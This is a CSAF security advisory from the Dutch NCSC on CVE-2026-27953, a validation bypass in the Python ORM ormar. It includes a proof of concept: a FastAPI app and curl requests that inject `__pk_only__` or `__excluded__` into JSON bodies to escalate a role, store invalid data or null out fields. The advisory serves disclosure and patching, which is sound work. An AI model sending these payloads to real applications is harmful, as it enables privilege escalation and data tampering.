{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or being kept up to date in real time. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use of, or the inability to use, the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of forum also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-27953",
        "tracking": {
            "current_release_date": "2026-04-01T07:43:29.548680Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-27953",
            "initial_release_date": "2026-03-20T10:34:46.689992Z",
            "revision_history": [
                {
                    "date": "2026-03-20T10:34:46.689992Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T10:34:48.416659Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-20T18:18:01.730751Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (9).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T18:18:04.665608Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T18:18:38.165997Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (9).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T18:18:39.753339Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T18:38:43.782176Z",
                    "number": "7",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-20T21:41:15.445593Z",
                    "number": "8",
                    "summary": "References created (9)."
                },
                {
                    "date": "2026-03-20T22:07:04.157282Z",
                    "number": "9",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T22:07:07.484000Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-21T12:44:25.080333Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (1)."
                },
                {
                    "date": "2026-03-28T07:40:00.956491Z",
                    "number": "12",
                    "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-28T07:40:02.967958Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-01T07:43:26.413460Z",
                    "number": "14",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products created (1)."
                },
                {
                    "date": "2026-04-01T07:43:26.720382Z",
                    "number": "15",
                    "summary": "Description removed for source.| Description created for source."
                }
            ],
            "status": "interim",
            "version": "15"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<0.23.1",
                                "product": {
                                    "name": "vers:unknown/<0.23.1",
                                    "product_id": "CSAFPID-5956287",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:collerek:ormar:*:*:*:*:*:python:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "ormar"
                    }
                ],
                "category": "vendor",
                "name": "collerek"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-5700554"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "ormar"
                            }
                        ],
                        "category": "product_family",
                        "name": "bookworm"
                    }
                ],
                "category": "vendor",
                "name": "debian"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<0.23.1",
                                "product": {
                                    "name": "vers:unknown/<0.23.1",
                                    "product_id": "CSAFPID-5873964"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "ormar"
                    }
                ],
                "category": "vendor",
                "name": "ormar-orm"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<0.23.1",
                                "product": {
                                    "name": "vers:unknown/<0.23.1",
                                    "product_id": "CSAFPID-5970948"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "ormar"
                    }
                ],
                "category": "vendor",
                "name": "unknown"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-27953",
            "cwe": {
                "id": "CWE-915",
                "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "### Summary\n\nA Pydantic validation bypass in `ormar`'s model constructor allows any unauthenticated user to skip **all** field validation — type checks, constraints, `@field_validator`/`@model_validator` decorators, choices enforcement, and required-field checks — by injecting `\"__pk_only__\": true` into a JSON request body. The unvalidated data is subsequently persisted to the database. This affects the **canonical usage pattern** recommended in ormar's official documentation and examples.\n\nA secondary `__excluded__` parameter injection uses the same design pattern to selectively nullify arbitrary model fields during construction.\n\n### Details\n\n**Root cause:** `NewBaseModel.__init__` ([`ormar/models/newbasemodel.py`, line 128](https://github.com/collerek/ormar/blob/master/ormar/models/newbasemodel.py#L128)) pops `__pk_only__` directly from user-supplied `**kwargs` before any validation occurs:\n\n```python\n# ormar/models/newbasemodel.py, lines 128-142\npk_only = kwargs.pop(\"__pk_only__\", False)      # ← extracted from user kwargs\nobject.__setattr__(self, \"__pk_only__\", pk_only)\n\nnew_kwargs, through_tmp_dict = self._process_kwargs(kwargs)\n\nif not pk_only:\n    # Normal path: full Pydantic validation\n    new_kwargs = self.serialize_nested_models_json_fields(new_kwargs)\n    self.__pydantic_validator__.validate_python(\n        new_kwargs, self_instance=self\n    )\nelse:\n    # Bypass path: NO validation at all\n    fields_set = {self.ormar_config.pkname}\n    values = new_kwargs\n    object.__setattr__(self, \"__dict__\", values)       # raw dict written directly\n    object.__setattr__(self, \"__pydantic_fields_set__\", fields_set)\n```\n\nThe `__pk_only__` flag was designed as an internal optimization for creating lightweight FK placeholder instances in [`ormar/fields/foreign_key.py` (lines 41, 527)](https://github.com/collerek/ormar/blob/master/ormar/fields/foreign_key.py#L41). 
However, because it is extracted from `**kwargs` via `.pop()` with a `False` default, any external caller that passes user-controlled data to the model constructor can inject this flag.\n\n**Why the canonical FastAPI + ormar pattern is vulnerable:**\n\nOrmar's official example ([`examples/fastapi_quick_start.py`, lines 55-58](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py#L55)) recommends using ormar models directly as FastAPI request body parameters:\n\n```python\n@app.post(\"/items/\", response_model=Item)\nasync def create_item(item: Item):\n    await item.save()\n    return item\n```\n\nFastAPI parses the JSON body and calls `TypeAdapter.validate_python(body_dict)`, which triggers ormar's `__init__`. The `__pk_only__` key is popped at line 128 **before** Pydantic's validator inspects the data, so Pydantic never sees it — even `extra='forbid'` would not prevent this, because the key is already consumed by ormar.\n\nThe ormar Pydantic `model_config` (set in [`ormar/models/helpers/pydantic.py`, line 108](https://github.com/collerek/ormar/blob/master/ormar/models/helpers/pydantic.py#L108)) does not set `extra='forbid'`, providing no protection even in theory.\n\n**What is bypassed when `__pk_only__=True`:**\n- All type coercion and type checking (e.g., string for int field)\n- `max_length` constraints on String fields\n- `choices` constraints\n- All `@field_validator` and `@model_validator` decorators\n- `nullable=False` enforcement at the Pydantic level\n- Required-field enforcement (only `pkname` is put in `fields_set`)\n- `serialize_nested_models_json_fields()` preprocessing\n\n**Save path persists unvalidated data to the database:**\n\nAfter construction with `pk_only=True`, calling `.save()` ([`ormar/models/model.py`, lines 89-107](https://github.com/collerek/ormar/blob/master/ormar/models/model.py#L89)) reads fields directly from `self.__dict__` via `_extract_model_db_fields()`, then executes 
`table.insert().values(**self_fields)` — persisting the unvalidated data to the database with no re-validation.\n\n**Secondary vulnerability — `__excluded__` injection:**\n\nThe same pattern applies to `__excluded__` at [`ormar/models/newbasemodel.py`, line 292](https://github.com/collerek/ormar/blob/master/ormar/models/newbasemodel.py#L292):\n\n```python\nexcluded: set[str] = kwargs.pop(\"__excluded__\", set())\n```\n\nAt lines 326-329, fields listed in `__excluded__` are silently set to `None`:\n\n```python\nfor field_to_nullify in excluded:\n    new_kwargs[field_to_nullify] = None\n```\n\nAn attacker can inject `\"__excluded__\": [\"email\", \"password_hash\"]` to nullify arbitrary fields during construction.\n\n**Affected entry points:**\n\n| Entry Point | Exploitable? |\n|---|---|\n| `async def create_item(item: Item)` (FastAPI route) | Yes |\n| `Model.objects.create(**user_dict)` | Yes |\n| `Model(**user_dict)` | Yes |\n| `Model.model_validate(user_dict)` | Yes |\n\n### PoC\n\n**Step 1: Create a FastAPI + ormar application using the canonical pattern from ormar's docs:**\n\n```python\n# app.py\nfrom contextlib import asynccontextmanager\nimport sqlalchemy\nimport uvicorn\nfrom fastapi import FastAPI\nimport ormar\n\nDATABASE_URL = \"sqlite+aiosqlite:///test.db\"\normar_base_config = ormar.OrmarConfig(\n    database=ormar.DatabaseConnection(DATABASE_URL),\n    metadata=sqlalchemy.MetaData(),\n)\n\n@asynccontextmanager\nasync def lifespan(app: FastAPI):\n    database_ = app.state.database\n    if not database_.is_connected:\n        await database_.connect()\n    # Create tables\n    engine = sqlalchemy.create_engine(DATABASE_URL.replace(\"+aiosqlite\", \"\"))\n    ormar_base_config.metadata.create_all(engine)\n    engine.dispose()\n    yield\n    database_ = app.state.database\n    if database_.is_connected:\n        await database_.disconnect()\n\napp = FastAPI(lifespan=lifespan)\ndatabase = ormar.DatabaseConnection(DATABASE_URL)\napp.state.database = 
database\n\nclass User(ormar.Model):\n    ormar_config = ormar_base_config.copy(tablename=\"users\")\n\n    id: int = ormar.Integer(primary_key=True)\n    name: str = ormar.String(max_length=50)\n    email: str = ormar.String(max_length=100)\n    role: str = ormar.String(max_length=20, default=\"user\")\n    balance: int = ormar.Integer(default=0)\n\n# Canonical ormar pattern from official examples\n@app.post(\"/users/\", response_model=User)\nasync def create_user(user: User):\n    await user.save()\n    return user\n\nif __name__ == \"__main__\":\n    uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n```\n\n**Step 2: Send a normal request (validation works correctly):**\n\n```bash\n# This correctly rejects — \"name\" exceeds max_length=50\ncurl -X POST http://127.0.0.1:8000/users/ \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"name\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\n    \"email\": \"user@example.com\"\n  }'\n# Returns: 422 Validation Error\n```\n\n**Step 3: Inject `__pk_only__` to bypass ALL validation:**\n\n```bash\ncurl -X POST http://127.0.0.1:8000/users/ \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"__pk_only__\": true,\n    \"name\": \"\",\n    \"email\": \"not-an-email\",\n    \"role\": \"superadmin\",\n    \"balance\": -99999\n  }'\n# Returns: 200 OK — all fields persisted to database WITHOUT validation\n# - \"name\" is empty despite being required\n# - \"email\" is not a valid email\n# - \"role\" is \"superadmin\" (bypassing any validator that restricts to \"user\"/\"admin\")\n# - \"balance\" is negative (bypassing any ge=0 constraint)\n```\n\n**Step 4: Inject `__excluded__` to nullify arbitrary fields:**\n\n```bash\ncurl -X POST http://127.0.0.1:8000/users/ \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"__excluded__\": [\"email\", \"role\"],\n    \"name\": \"attacker\",\n    \"email\": \"will-be-nullified@example.com\",\n    \"role\": \"will-be-nullified\"\n  }'\n# 
Returns: 200 OK — email and role are set to NULL regardless of input\n```\n\n### Impact\n\n**Who is impacted:** Every application using ormar's canonical FastAPI integration pattern (`async def endpoint(item: OrmarModel)`) is vulnerable. This is the primary usage pattern documented in ormar's official examples and documentation.\n\n**Vulnerability type:** Complete Pydantic validation bypass.\n\n**Impact scenarios:**\n- **Privilege escalation**: If a model has a `role` or `is_admin` field with a Pydantic validator restricting values to `\"user\"`, an attacker can set `role=\"superadmin\"` by bypassing the validator\n- **Data integrity violation**: Type constraints (`max_length`, `ge`/`le`, regex patterns) are all bypassed — invalid data is persisted to the database\n- **Business logic bypass**: Custom `@field_validator` and `@model_validator` decorators (e.g., enforcing email format, age ranges, cross-field dependencies) are entirely skipped\n- **Field nullification** (via `__excluded__`): Audit fields, tracking fields, or required business fields can be selectively set to NULL\n\n**Suggested fix:**\n\nReplace `kwargs.pop(\"__pk_only__\", False)` with a keyword-only parameter that cannot be injected via `**kwargs`:\n\n```python\n# Before (vulnerable)\ndef __init__(self, *args: Any, **kwargs: Any) -> None:\n    ...\n    pk_only = kwargs.pop(\"__pk_only__\", False)\n\n# After (secure)\ndef __init__(self, *args: Any, _pk_only: bool = False, **kwargs: Any) -> None:\n    ...\n    object.__setattr__(self, \"__pk_only__\", _pk_only)\n```\n\nApply the same fix to `__excluded__`:\n\n```python\n# Before (vulnerable)\nexcluded: set[str] = kwargs.pop(\"__excluded__\", set())\n\n# After (secure) — pass via keyword-only _excluded parameter\ndef __init__(self, *args: Any, _pk_only: bool = False, _excluded: set | None = None, **kwargs: Any) -> None:\n    ...\n    # In _process_kwargs:\n    excludes = _excluded or set()\n```\n\nInternal callers in `foreign_key.py` would pass 
`_pk_only=True` as a named argument. Keyword-only parameters prefixed with `_` cannot be injected via JSON body deserialization or `Model(**user_dict)` unpacking.",
                    "title": "github - https://api.github.com/advisories/GHSA-f964-whrq-44h8"
                },
                {
                    "category": "description",
                    "text": "ormar is a async mini ORM for Python. Versions 0.23.0 and below are vulnerable to Pydantic validation bypass through the model constructor, allowing any unauthenticated user to skip all field validation by injecting \"__pk_only__\": true into a JSON request body. By injecting \"__pk_only__\": true into a JSON request body, an unauthenticated attacker can skip all field validation and persist unvalidated data directly to the database. A secondary __excluded__ parameter injection uses the same pattern to selectively nullify arbitrary model fields (e.g., email or role) during construction. This affects ormar's canonical FastAPI integration pattern recommended in its official documentation, enabling privilege escalation, data integrity violations, and business logic bypass in any application using ormar.Model directly as a request body parameter. This issue has been fixed in version 0.23.1.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27953.json"
                },
                {
                    "category": "description",
                    "text": "ormar is a async mini ORM for Python. Versions 0.23.0 and below are vulnerable to Pydantic validation bypass through the model constructor, allowing any unauthenticated user to skip all field validation by injecting \"__pk_only__\": true into a JSON request body. By injecting \"__pk_only__\": true into a JSON request body, an unauthenticated attacker can skip all field validation and persist unvalidated data directly to the database. A secondary __excluded__ parameter injection uses the same pattern to selectively nullify arbitrary model fields (e.g., email or role) during construction. This affects ormar's canonical FastAPI integration pattern recommended in its official documentation, enabling privilege escalation, data integrity violations, and business logic bypass in any application using ormar.Model directly as a request body parameter. This issue has been fixed in version 0.23.1.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27953"
                },
                {
                    "category": "description",
                    "text": "ormar is a async mini ORM for Python. Versions 0.23.0 and below are vulnerable to Pydantic validation bypass through the model constructor, allowing any unauthenticated user to skip all field validation by injecting \"__pk_only__\": true into a JSON request body. By injecting \"__pk_only__\": true into a JSON request body, an unauthenticated attacker can skip all field validation and persist unvalidated data directly to the database. A secondary __excluded__ parameter injection uses the same pattern to selectively nullify arbitrary model fields (e.g., email or role) during construction. This affects ormar's canonical FastAPI integration pattern recommended in its official documentation, enabling privilege escalation, data integrity violations, and business logic bypass in any application using ormar.Model directly as a request body parameter. This issue has been fixed in version 0.23.1.",
                    "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-27953"
                },
                {
                    "category": "description",
                    "text": "Affected versions of the ormar package are vulnerable to Improper Input Validation due to internal constructor control flags being accepted from user-supplied keyword arguments. The vulnerability exists in NewBaseModel.__init__, which pops __pk_only__ and __excluded__ from **kwargs before Pydantic validation runs, allowing the normal self.__pydantic_validator__.validate_python(...) path to be skipped and permitting arbitrary fields to be set to None during _process_kwargs.",
                    "title": "pyupio - https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json"
                },
                {
                    "category": "other",
                    "text": "0.00133",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.6",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Exploit code publicly available, There is exploit data available from source Nvd, The value of the most recent CVSS (V3) score",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5873964",
                    "CSAFPID-5700554",
                    "CSAFPID-5956287",
                    "CSAFPID-5970948"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-f964-whrq-44h8"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27953.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27953"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - debian",
                    "url": "https://security-tracker.debian.org/tracker/CVE-2026-27953"
                },
                {
                    "category": "external",
                    "summary": "Source - pyupio",
                    "url": "https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/ormar-orm/ormar/security/advisories/GHSA-f964-whrq-44h8"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-f964-whrq-44h8"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/ormar-orm/ormar/commit/7f22aa21a7614b993970345b392dabb0ccde0ab3"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/ormar-orm/ormar/blob/master/examples/fastapi_quick_start.py#L55"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/ormar-orm/ormar/blob/master/ormar/fields/foreign_key.py#L41"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/helpers/pydantic.py#L108"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/model.py#L89"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L128"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/ormar-orm/ormar/blob/master/ormar/models/newbasemodel.py#L292"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/ormar-orm/ormar/releases/tag/0.23.1"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27953"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
                        "baseScore": 7.1,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5700554",
                        "CSAFPID-5873964",
                        "CSAFPID-5956287",
                        "CSAFPID-5970948"
                    ]
                }
            ],
            "title": "CVE-2026-27953"
        }
    ]
}